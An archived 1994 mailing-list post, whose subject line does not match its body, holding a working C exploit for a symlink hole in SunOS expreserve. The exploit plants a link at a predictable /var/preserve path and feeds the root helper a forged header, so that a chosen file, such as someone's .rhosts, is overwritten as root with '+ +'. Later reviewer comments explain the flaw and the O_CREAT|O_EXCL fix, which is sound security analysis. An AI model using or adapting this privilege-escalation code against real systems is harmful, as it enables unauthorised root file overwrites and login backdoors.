Routing problem - solved
From: newsham () uhunix uhcc hawaii edu (Tim Newsham)
Date: Sun, 2 Oct 1994 08:18:10 -1000
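/*
* Exploit a security hole in expreserve on sun4.1.3
* <program> filename
* overwrites filename as root with garbage, chowns it to you
* (note: a 4.1.1 test overwrote with no chown;
* the first 4 characters written are "+ +\n",
* which can be used to overwrite anyone's .rhosts as root)
*
* Reviewer note: as far as this listing shows, the hole is that the
* privileged expreserve writes its preserve file through a symlink
* planted beforehand at a predictable name under /var/preserve/<user>/.
* Creating that file with O_CREAT|O_EXCL, so that an existing link is
* refused rather than followed, closes this class of bug.
*
* Tim N.
*/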
#include <pwd.h>
#include <fcntl.h>
/*
* Constants and record layout for the header that main() writes at the
* start of the "./Ex" temp file before handing it to /usr/lib/expreserve
* on stdin.
*
* NOTE(review): presumably this mirrors the ex/vi temp-file header that
* expreserve parses on SunOS 4.1.x. The real definition is not on this
* page, so the field meanings below are inferred from the names and from
* how main() fills them -- confirm against the ex sources.
*
* main() writes the struct raw (sizeof(H) bytes), so the image in the
* file depends on field order, field sizes and compiler padding.
*
* Defensive reading: every field here, including uid and name, comes
* from a file the unprivileged caller controls. A privileged consumer
* has to treat the whole record as untrusted input.
*/
#define HBLKS 2 /* stored in Blocks[0], and HBLKS+1 in Blocks[1]; presumably a header block count -- TODO confirm */
#define FNSIZE 128 /* size of the name[] field */
#define BLKS 900 /* number of entries in Blocks[] */
typedef struct {
time_t time; /* main() overwrites these bytes with the text "+ +\n" */
int uid; /* set to getuid() by main() */
int flines; /* set to 0 by main(); presumably a line count -- TODO confirm */
char name[FNSIZE]; /* set to "NoName" by main() */
short Blocks[BLKS]; /* only entries 0 and 1 are assigned by main() */
short encrypted; /* never assigned by main() */
} header;
/*
* Proof-of-concept entry point. Usage: <program> destination
*
* Sequence, as written below:
*   1. create a symlink /var/preserve/<login>/Exaaa<pid> -> destination
*   2. make "./Ex" file descriptor 0 and write a header record to it
*   3. exec /usr/lib/expreserve with that descriptor as its stdin
*
* Defensive reading: the file's header comment reports that destination
* is then overwritten as root. That implies the helper runs with root
* privilege, builds its output name from values the caller can predict
* (login name and pid), and opens it in a way that follows a link that
* is already there. None of the helper's code is on this page, so this
* is inferred. The fix belongs in the helper: create the preserve file
* with O_CREAT|O_EXCL so an existing link is an error, do not let users
* create entries in the directory it writes to, and validate the header
* read from stdin instead of trusting it. On an affected host, symlinks
* under /var/preserve/ are the artifact to look for.
*
* Exit status: 1 on wrong argument count, 2 if "./Ex" cannot be opened.
* If the exec fails, control falls off the end of main with no explicit
* return value.
*/
main(argc,argv)
int argc;
char **argv;
{
int p,u; /* p: our pid; u is never used */
header H; /* on the stack and not zeroed: fields not assigned below keep whatever bytes were there */
struct passwd *pw;
char buf[100],*dest; /* buf: path of the symlink; dest: argv[1] */
if(argc!=2) {
printf("usage: %s destination\n",argv[0]);
exit(1);
}
dest = argv[1];
p = getpid();
pw = getpwuid(getuid()); /* NOTE(review): result is not checked for NULL before pw->pw_name is read */
/* Path is /var/preserve/<login>/Exaaa plus the pid zero-padded to 5 digits. */
/* NOTE(review): unbounded sprintf into a 100-byte buffer. */
sprintf(buf,"/var/preserve/%s/Exaaa%.5d",pw->pw_name,p);
symlink(dest,buf); /* return value ignored; nothing is reported if the link could not be created */
/* Close stdin so that the open() below, which returns the lowest free
 * descriptor, yields 0. The code only checks for failure; it assumes
 * rather than verifies that the descriptor is 0. */
close(0);
if(open("./Ex",O_RDWR|O_CREAT,0666)<0) {
printf("Cant open Ex (temp file)\n");
exit(2);
}
/* Fill in the header so that expreserve accepts the file as a genuine
 * editor temp file (author's stated intent). */
H.time = 12345; /* placeholder; replaced by the strcpy on the next line */
/* Copies 5 bytes ('+', ' ', '+', '\n', NUL) over the start of H, passing
 * a time_t pointer where a char pointer is expected. The author relies
 * on time_t being a long; if it is 4 bytes, the NUL lands in the first
 * byte of the following field, which is assigned afterwards. */
strcpy(&H.time,"+ +\n");
strcpy(H.name,"NoName");
H.flines = 0;
H.uid = getuid();
H.Blocks[0] = HBLKS;
H.Blocks[1] = HBLKS+1;
/* Blocks[2..], encrypted and the tail of name[] are left uninitialized,
 * which is consistent with the "garbage" the header comment mentions. */
write(0,&H,sizeof(H)); /* raw struct image; return value ignored */
lseek(0,0,0); /* whence 0 is SEEK_SET: rewind so the exec'd program reads from the start */
printf("Made temp file 'Ex'. You can remove it when done.\n");
/* Descriptor 0 survives the exec, so expreserve gets "./Ex" as stdin.
 * NOTE(review): the argument list is terminated with a bare 0, not a
 * null pointer cast to char pointer. */
execl("/usr/lib/expreserve","expreserve",0);
printf("Couldnt exec!\n"); /* reached only when execl returns, i.e. it failed */
}
